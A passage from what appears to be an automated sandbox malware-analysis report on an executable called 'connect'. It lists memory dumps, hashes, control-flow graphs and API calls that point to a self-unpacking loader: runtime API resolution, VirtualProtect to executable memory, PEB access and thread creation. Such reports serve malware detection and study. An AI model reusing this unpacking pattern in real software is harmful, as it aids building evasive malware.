                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-3916222277
                                                      • Opcode ID: 112074e21bae201ac19c45c2c3de9d20e6f92633d091a124c34c80f87dd45fa1
                                                      • Instruction ID: c6a081dfb3d1d22671ee0c8c93ac95900cf9cc06b918457006915dd628facda9
                                                      • Opcode Fuzzy Hash: 112074e21bae201ac19c45c2c3de9d20e6f92633d091a124c34c80f87dd45fa1
                                                      • Instruction Fuzzy Hash: 0BD27C37D11B294BE3148A38CC857E4A922EBD9320F51E772D86DDB7D4C63C8D868B85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ConsoleFree
                                                      • String ID: Error: Division by zero is not allowed.$Error: Division by zero or non-positive values is not allowed.$Invalid operation.$N$Result: $Result: $Result: $Result: $Result:
                                                      • API String ID: 771614528-2273519392
                                                      • Opcode ID: b3db4885e2fa4081b33188e716fe796380e0d0396435d28f73e5bb278dbab8da
                                                      • Instruction ID: 71462df127c69a59ea29f65e18304f9840dc87bac97ef303429e6d0c1854091c
                                                      • Opcode Fuzzy Hash: b3db4885e2fa4081b33188e716fe796380e0d0396435d28f73e5bb278dbab8da
                                                      • Instruction Fuzzy Hash: 3B4182B0E40618D2CF007BB5AE1F5EDB971BB44709F2005BAE885B21C2EAFD4168436E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 135 41d910-41d96b 137 41d971-41dac3 135->137 138 41dac8-41dbab GetModuleHandleA GetProcAddress VirtualProtect 135->138
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(0041FCCC,00000045), ref: 0041DAD2
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041DAD9
                                                      • VirtualProtect.KERNELBASE(Function_0001C000,00001910,00000040,?), ref: 0041DB9F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                      • String ID: =$E$U$b$q
                                                      • API String ID: 2099061454-2355070441
                                                      • Opcode ID: 6e4361986396deaf7f6ed0727193d9d4968c1a3968c8252d14448447d96609d1
                                                      • Instruction ID: 52025b6442cd5ceb9bd7a4aeeeab6d24b33ebd08995b398a6cfcb45825a3e8d5
                                                      • Opcode Fuzzy Hash: 6e4361986396deaf7f6ed0727193d9d4968c1a3968c8252d14448447d96609d1
                                                      • Instruction Fuzzy Hash: B4818260C0D2DC89DF0687FD8856AEDBFF14F6F282F08429AD8D5B62C6C1A84A45C775
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      APIs
                                                      • __lock.LIBCMT ref: 0040824D
                                                        • Part of subcall function 0040F225: __mtinitlocknum.LIBCMT ref: 0040F23B
                                                        • Part of subcall function 0040F225: __amsg_exit.LIBCMT ref: 0040F247
                                                        • Part of subcall function 0040F225: EnterCriticalSection.KERNEL32(0041086E,0041086E,?,00415A1F,00000004,00423800,0000000C,0040E360,00000001,0041087D,00000000,00000000,00000000,?,0041087D,00000001), ref: 0040F24F
                                                      • ___sbh_find_block.LIBCMT ref: 00408258
                                                      • ___sbh_free_block.LIBCMT ref: 00408267
                                                      • RtlFreeHeap.NTDLL(00000000,00000001,00423208,0000000C,0040F206,00000000,00423570,0000000C,0040F240,00000001,0041086E,?,00415A1F,00000004,00423800,0000000C), ref: 00408297
                                                      • GetLastError.KERNEL32(?,00415A1F,00000004,00423800,0000000C,0040E360,00000001,0041087D,00000000,00000000,00000000,?,0041087D,00000001,00000214), ref: 004082A8
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 2714421763-0
                                                      • Opcode ID: d0c3dee8843f75799489d0f138ea0b3a873eba5d389f69fc1cc98fd2a6883df3
                                                      • Instruction ID: 2990f890607757f5a922091944e2d609da319efa880150a095de5bbc830048ac
                                                      • Opcode Fuzzy Hash: d0c3dee8843f75799489d0f138ea0b3a873eba5d389f69fc1cc98fd2a6883df3
                                                      • Instruction Fuzzy Hash: 68018F31802609AADF306BB1AE0679E3A64AF51724F2441BFF844B61D1CE3C89498A5D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      control_flow_graph 165 41cc90-41ccaf 167 41ccb5-41cce4 165->167 168 41cdbb-41d53c GetPEB 165->168 171 41cce6-41ccf2 167->171 172 41cd0d-41cd19 167->172 169 41d57d-41d730 CreateThread 168->169 170 41d53e-41d57a call 4024a0 lstrlenW 168->170 176 41d752-41d905 WaitForSingleObject 169->176 177 41d732-41d74f Sleep call 4024a0 169->177 170->169 171->172 178 41ccf4-41ccff 171->178 173 41cd35-41cd40 172->173 174 41cd1b-41cd27 172->174 181 41cd42-41cd4e 173->181 182 41cd5c-41cd68 173->182 174->173 179 41cd29-41cd33 174->179 177->176 178->172 185 41cd01-41cd0b 178->185 186 41cd74-41cdb6 VirtualProtect 179->186 181->182 187 41cd50-41cd5a 181->187 182->186 188 41cd6a 182->188 185->186 187->186 188->186
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,00425010,00000040,?), ref: 0041CDB0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: @
                                                      • API String ID: 544645111-2766056989
                                                      • Opcode ID: 4418e2bde67497345e7d08d8bbbdae751a2b4919af2dacef739c0337c382b28b
                                                      • Instruction ID: 75a87302821483790463d653b9acefaa2c69f64846734af4eb6d26f58d86bdb2
                                                      • Opcode Fuzzy Hash: 4418e2bde67497345e7d08d8bbbdae751a2b4919af2dacef739c0337c382b28b
                                                      • Instruction Fuzzy Hash: FF11DA71A04128CBDB68CB04EDD0BE9F7B2AB69304F1482DAD58DAB245C7789ED1CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      control_flow_graph 190 41dbb0-41dbb9 191 41dbc0-41de16 190->191 192 41dbbb 190->192 195 41de21-41de28 191->195 192->191 193 41dbbd 192->193 193->191 196 41de35-41de3c 195->196 197 41de2a-41de33 195->197 199 41de42-41dedb call 408389 196->199 200 41e12b-41e131 196->200 197->195 199->200 203 41dee1-41e0a4 call 41d910 call 4082c0 call 40822f call 402470 call 41c000 199->203 213 41e0a9-41e128 203->213 213->200
                                                      APIs
                                                      • _malloc.LIBCMT ref: 0041DECC
                                                      • _memset.LIBCMT ref: 0041E07C
                                                        • Part of subcall function 0040822F: __lock.LIBCMT ref: 0040824D
                                                        • Part of subcall function 0040822F: ___sbh_find_block.LIBCMT ref: 00408258
                                                        • Part of subcall function 0040822F: ___sbh_free_block.LIBCMT ref: 00408267
                                                        • Part of subcall function 0040822F: RtlFreeHeap.NTDLL(00000000,00000001,00423208,0000000C,0040F206,00000000,00423570,0000000C,0040F240,00000001,0041086E,?,00415A1F,00000004,00423800,0000000C), ref: 00408297
                                                        • Part of subcall function 0040822F: GetLastError.KERNEL32(?,00415A1F,00000004,00423800,0000000C,0040E360,00000001,0041087D,00000000,00000000,00000000,?,0041087D,00000001,00000214), ref: 004082A8
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lock_malloc_memset
                                                      • String ID:
                                                      • API String ID: 2273839258-0
                                                      • Opcode ID: 18f380a5402a9ca92be87728ed9d1d6be3a105e0eb3268b470f665fd647226b5
                                                      • Instruction ID: 525a01d4276e096fb288f17750ee73fcf24bc7da142748c9cf8dc237c7912a96
                                                      • Opcode Fuzzy Hash: 18f380a5402a9ca92be87728ed9d1d6be3a105e0eb3268b470f665fd647226b5
                                                      • Instruction Fuzzy Hash: 0DD17A6BD22F2C06F304053DDD8A3A49806D7EA335FA1E772ED79CB6E8C67D89460185
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      control_flow_graph 214 40f079-40f09b HeapCreate 215 40f09d-40f09e 214->215 216 40f09f-40f0a8 214->216
                                                      APIs
                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040F08E
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateHeap
                                                      • String ID:
                                                      • API String ID: 10892065-0
                                                      • Opcode ID: d0edcfdf08b9637156f68be5a89579f72dc6d33e05ecf5e5d9b571732366e468
                                                      • Instruction ID: 752dcf6b803cb9ba929166f7344018921869f66d3807af90a0c540f244c8e45e
                                                      • Opcode Fuzzy Hash: d0edcfdf08b9637156f68be5a89579f72dc6d33e05ecf5e5d9b571732366e468
                                                      • Instruction Fuzzy Hash: D4D0A7769943056EDB105F717C48B623FDCD788795F00847AF90CC6591F674C581CA08
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ___getlocaleinfo
                                                      • String ID:
                                                      • API String ID: 1937885557-0
                                                      • Opcode ID: 020488f2f5dac079309b909a4a3bbc09f7787dd2dac1646b10375557b69ebfc2
                                                      • Instruction ID: 481e8453f58d89bf96c151aa3e26672d27f2b5d65a9642549e7214787c1f8824
                                                      • Opcode Fuzzy Hash: 020488f2f5dac079309b909a4a3bbc09f7787dd2dac1646b10375557b69ebfc2
                                                      • Instruction Fuzzy Hash: A4E1EDB290064DFEEB11DAF1CC81DFFB7BDEB44788F10092BB61593041EAB4AA559760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __CxxThrowException@8.LIBCMT ref: 00402BD3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8Throw
                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                      • API String ID: 2005118841-1866435925
                                                      • Opcode ID: 812a0a1ae132bfdc707b62cf2de4f419502b545a2be966b308cf71b47a5b351a
                                                      • Instruction ID: 582ab88f02e5b86f610db7a2580e4b78016e8690ee7f8af608ca5f6596207ee3
                                                      • Opcode Fuzzy Hash: 812a0a1ae132bfdc707b62cf2de4f419502b545a2be966b308cf71b47a5b351a
                                                      • Instruction Fuzzy Hash: F1318C319002189BDB15EB51CE96FEDB334BB54304F5481ABE409372C5DAB8AE89CF68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00407365
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040736F
                                                      • int.LIBCPMTD ref: 00407386
                                                        • Part of subcall function 00403D20: std::_Lockit::_Lockit.LIBCPMT ref: 00403D36
                                                      • std::locale::_Getfacet.LIBCPMTD ref: 0040738F
                                                      • ctype.LIBCPMT ref: 004073A9
                                                      • std::bad_exception::bad_exception.LIBCMT ref: 004073BD
                                                      • __CxxThrowException@8.LIBCMT ref: 004073CB
                                                      • std::locale::facet::_Incref.LIBCPMTD ref: 004073DB
                                                      • std::locale::facet::facet_Register.LIBCPMT ref: 004073E1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                      • String ID: bad cast
                                                      • API String ID: 2535038987-3145022300
                                                      • Opcode ID: 1379c0a6d88319947838c04e6e962b6869958e925bba7ebd3363b9122ea8cd79
                                                      • Instruction ID: fcf0c3036a91ed6d4d430263ba0a86760ec8eea11a40a9bc9ab3eb6a0992eecb
                                                      • Opcode Fuzzy Hash: 1379c0a6d88319947838c04e6e962b6869958e925bba7ebd3363b9122ea8cd79
                                                      • Instruction Fuzzy Hash: CC018E3190021997CB05EB619982AAEB235AF40724F20413FE810B72D1DF7CAA02D79E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00407584
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040758E
                                                      • int.LIBCPMTD ref: 004075A5
                                                        • Part of subcall function 00403D20: std::_Lockit::_Lockit.LIBCPMT ref: 00403D36
                                                      • std::locale::_Getfacet.LIBCPMTD ref: 004075AE
                                                      • codecvt.LIBCPMT ref: 004075C8
                                                      • std::bad_exception::bad_exception.LIBCMT ref: 004075DC
                                                      • __CxxThrowException@8.LIBCMT ref: 004075EA
                                                      • std::locale::facet::_Incref.LIBCPMTD ref: 004075FA
                                                      • std::locale::facet::facet_Register.LIBCPMT ref: 00407600
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                      • String ID: bad cast
                                                      • API String ID: 577375395-3145022300
                                                      • Opcode ID: 724c92b36877de02bebbfcc101ddd99d7760593737bf6d70fb174b301d872ed8
                                                      • Instruction ID: 0234305c793fc36e413bac2841398bb3da433a4839db7dc567d3fa02cbfa3116
                                                      • Opcode Fuzzy Hash: 724c92b36877de02bebbfcc101ddd99d7760593737bf6d70fb174b301d872ed8
                                                      • Instruction Fuzzy Hash: 2B018E31904618A7CB05EB61C882AEEB635AF40768F20453FE4117B2D1DF7CAA42979E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00403C6B
                                                      • int.LIBCPMTD ref: 00403C7D
                                                        • Part of subcall function 00403D20: std::_Lockit::_Lockit.LIBCPMT ref: 00403D36
                                                      • std::locale::_Getfacet.LIBCPMTD ref: 00403C8C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LockitLockit::_std::_$Getfacetstd::locale::_
                                                      • String ID: bad cast
                                                      • API String ID: 3702371321-3145022300
                                                      • Opcode ID: d7f3f2c83ea86788e5715911672a769d94058c37080acac9ea1980dafcf32624
                                                      • Instruction ID: 641631514a291ec6eb761895ba9dd386da080ab41ea4be51978102a4e08a800c
                                                      • Opcode Fuzzy Hash: d7f3f2c83ea86788e5715911672a769d94058c37080acac9ea1980dafcf32624
                                                      • Instruction Fuzzy Hash: 2721E974D04209DBCB04EFA5D981AEEBBB4BF48305F20856EE415B72D0DB786B41CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00405C9B
                                                      • int.LIBCPMTD ref: 00405CAD
                                                        • Part of subcall function 00403D20: std::_Lockit::_Lockit.LIBCPMT ref: 00403D36
                                                      • std::locale::_Getfacet.LIBCPMTD ref: 00405CBC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LockitLockit::_std::_$Getfacetstd::locale::_
                                                      • String ID: bad cast
                                                      • API String ID: 3702371321-3145022300
                                                      • Opcode ID: 289da77ba0289746a966c4be2f9d962841ea674fcb33afa542e32ad480ffb740
                                                      • Instruction ID: 1046cc1c868ef3ed3385219323bec5a0f6ab13d9a00f201b0224fc02e787792a
                                                      • Opcode Fuzzy Hash: 289da77ba0289746a966c4be2f9d962841ea674fcb33afa542e32ad480ffb740
                                                      • Instruction Fuzzy Hash: DE21E974D00209DBCB04EFA5D9859EEB7B4BF48304F20856FE415772D0DB786A41CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004061E0: _localeconv.LIBCMT ref: 004061E7
                                                      • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0040607C
                                                        • Part of subcall function 004062A0: _strlen.LIBCMT ref: 004062AA
                                                      • std::_Locinfo::_Getcvt.LIBCPMTD ref: 004060A0
                                                      • std::_Locinfo::_Getcvt.LIBCPMTD ref: 004060C6
                                                      • std::_Locinfo::_Getcvt.LIBCPMTD ref: 00406113
                                                      • std::_Locinfo::_Getcvt.LIBCPMTD ref: 00406139
                                                      • std::_Locinfo::_Getcvt.LIBCPMTD ref: 00406168
                                                      • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0040618A
                                                      • std::_Locinfo::_Getcvt.LIBCPMTD ref: 004061A9
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmp
                                                      Similarity
                                                      • API ID: GetcvtLocinfo::_std::_$_localeconv_strlen
                                                      • String ID:
                                                      • API String ID: 3869368768-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __CreateFrameInfo.LIBCMT ref: 0040BA29
                                                        • Part of subcall function 004087EC: __getptd.LIBCMT ref: 004087FA
                                                        • Part of subcall function 004087EC: __getptd.LIBCMT ref: 00408808
                                                      • __getptd.LIBCMT ref: 0040BA33
                                                        • Part of subcall function 004108CB: __getptd_noexit.LIBCMT ref: 004108CE
                                                        • Part of subcall function 004108CB: __amsg_exit.LIBCMT ref: 004108DB
                                                      • __getptd.LIBCMT ref: 0040BA41
                                                      • __getptd.LIBCMT ref: 0040BA4F
                                                      • __getptd.LIBCMT ref: 0040BA5A
                                                      • _CallCatchBlock2.LIBCMT ref: 0040BA80
                                                        • Part of subcall function 00408891: __CallSettingFrame@12.LIBCMT ref: 004088DD
                                                        • Part of subcall function 0040BB27: __getptd.LIBCMT ref: 0040BB36
                                                        • Part of subcall function 0040BB27: __getptd.LIBCMT ref: 0040BB44
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 1602911419-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __getptd.LIBCMT ref: 00414336
                                                        • Part of subcall function 004108CB: __getptd_noexit.LIBCMT ref: 004108CE
                                                        • Part of subcall function 004108CB: __amsg_exit.LIBCMT ref: 004108DB
                                                      • __amsg_exit.LIBCMT ref: 00414356
